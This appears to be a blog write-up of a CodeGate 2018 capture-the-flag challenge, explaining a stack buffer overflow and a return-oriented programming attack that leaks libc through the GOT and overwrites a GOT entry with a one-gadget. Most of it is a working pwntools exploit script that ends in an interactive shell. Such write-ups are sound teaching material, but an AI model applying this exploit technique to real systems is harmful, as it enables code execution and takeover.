Introduction
Finally come back from Spring Festival vacation. Since I think Readme-revenge is not a typical example on ROP attack. I think I can use the easiest challenge in CodeGate 2018 to demonstrate the usage of ROP attack.
Vulnerability Analysis
ASLR and stack canary is not enabled in the binary. Furthermore, there is an obvious stack buffer overflow in function your_turn.
Exploit Plan
The exploit is divided into two parts: (l)Leak the libc version via constructing ROP chain to read function pointer in GOT. (2)Construct ROP to use read to overwrite function pointer in GOT to magic gadget.
Exploit
from pwn import * DEBUG = int(sys.argv[1]); if(DEBUG == 0): r = remote("ch41l3ng3s.codegate.kr", 3131); elif(DEBUG == 1): r = process("./BaskinRobins31"); elif(DEBUG == 2): r = process("./BaskinRobins31"); gdb.attach(r, '''source ./script'''); def exploit(): helper = 0x40087a; junk = 0x424242424242; payload = "A"*0xb0; payload += p64(0x6020b8); payload += p64(helper); payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4); payload += p64(junk) * 20; r.recvuntil("(1-3)"); r.send(payload); time.sleep(2); payload2 = p64(helper); payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb); payload2 += p64(0x6020c0) + p64(0x414141414141)*4; payload2 += p64(0x4008f4); r.send(payload2); r.recvuntil(":("); r.recv(2); leakValue1 = u64(r.recv(8)); leakValue2 = u64(r.recv(8)); leakValue3 = u64(r.recv(8)); leakValue4 = u64(r.recv(8)); leakValue5 = u64(r.recv(8)); leakValue6 = u64(r.recv(8)); leakValue7 = u64(r.recv(8)); leakValue8 = u64(r.recv(8)); leakValue9 = u64(r.recv(8)); log.info("0x%x", leakValue6); log.info("0x%x", leakValue7); log.info("0x%x", leakValue8); log.info("0x%x", leakValue9); libcBase = leakValue8 - 0xf7250; log.info("Libc Base: 0x%x", libcBase); oneGadget = libcBase + 0xf1147; payload3 = p64(oneGadget); r.send(payload3); r.interactive(); exploit();
Conclusion
It’s not a difficult but typical ROP challenge. Since Readme-revenge in 34C3 is like a riddle, I take this challenge as an example on ROP attack.